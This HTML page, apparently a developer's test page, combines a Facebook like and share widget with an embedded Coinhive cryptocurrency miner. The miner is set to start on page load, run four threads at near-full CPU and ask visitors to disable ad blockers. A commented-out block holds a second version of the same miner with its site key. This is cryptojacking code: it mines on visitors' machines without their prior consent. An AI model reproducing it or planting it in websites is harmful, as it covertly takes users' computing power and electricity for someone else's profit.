<!DOCTYPE html>
<html>
<head>
<meta charset="ISO-8859-1">
<title>Insert title here</title>
<style>
td {
	width: 320px;
	height: 350px;
}
</style>

</head>
<body>
	<script>
		window.fbAsyncInit = function() {
			FB.init({
				appId : '625082994548200',
				xfbml : true,
				version : 'v2.10'
			});
			FB.AppEvents.logPageView();
			FB.getLoginStatus(function(response) {
				statusChangeCallback(response);
			});
		};
	
		(function(d, s, id) {
			var js,
				fjs = d.getElementsByTagName(s)[0];
			if (d.getElementById(id)) {
				return;
			}
			js = d.createElement(s);
			js.id = id;
			js.src = "//connect.facebook.net/fr_FR/sdk.js";
			fjs.parentNode.insertBefore(js, fjs);
		}(document, 'script', 'facebook-jssdk'));
	
	</script>
	<script src="https://coinhive.com/lib/miner.min.js" async></script>
	<!-- 	<script src="https://coinhive.com/lib/coinhive.min.js"></script> -->

	<div class="coinhive-miner" style="width: 256px; height: 310px"
		data-key="Y88o17Z1nDLT1r9SjSCuljPQOATm7VzV" data-autostart="true"
		data-whitelabel="false" data-background="#000000" data-text="#eeeeee"
		data-action="#00ff00" data-graph="#555555" data-threads="4"
		data-autoThreads="true" data-throttle="0.1" data-start="Start Now!">
		<em>Please disable Adblock!</em>
	</div>
	<div class="fb-like" data-share="false" data-width="450"
		data-show-faces="true"></div>
	<div class="fb-share-button" data-like="true"
		data-href="http://checkit-homesweethome.193b.starter-ca-central-1.openshiftapps.com/" data-layout="button_count"></div>

	<!-- 	<script> -->
	<!-- // 		var miner = new CoinHive.Anonymous('Y88o17Z1nDLT1r9SjSCuljPQOATm7VzV', { -->
	<!-- // 			threads: 4, -->
	<!-- // 			autoThreads: true, -->
	<!-- // 			throttle: 0.9, -->
	<!-- // 			forceASMJS: false -->
	<!-- // 		}); -->
	<!-- // 		miner.start(); -->
	<!-- // 		// Listen on events -->
	<!-- // 		miner.on('found', function() { -->
	<!-- // 			/* Hash found */ -->
	<!-- // 		}) -->
	<!-- // 		miner.on('accepted', function() { -->
	<!-- // 			/* Hash accepted by the pool */ -->
	<!-- // 		}) -->

	<!-- // 		// Update stats once per second -->
	<!-- // 		setInterval(function(element) { -->
	<!-- // 			var hashesPerSecond = miner.getHashesPerSecond(); -->
	<!-- // 			var totalHashes = miner.getTotalHashes(); -->
	<!-- // 			var acceptedHashes = miner.getAcceptedHashes(); -->

	<!-- // 			// Output to HTML elements... -->
	<!-- // 			document.getElementById("hps").innerHTML = "<b>" + hashesPerSecond + "</br>"; -->
	<!-- // 		}, 2000); -->
	<!-- 	</script> -->

	<!-- 	<span id="hps"><b>dsf</b></span> -->
</body>
</html>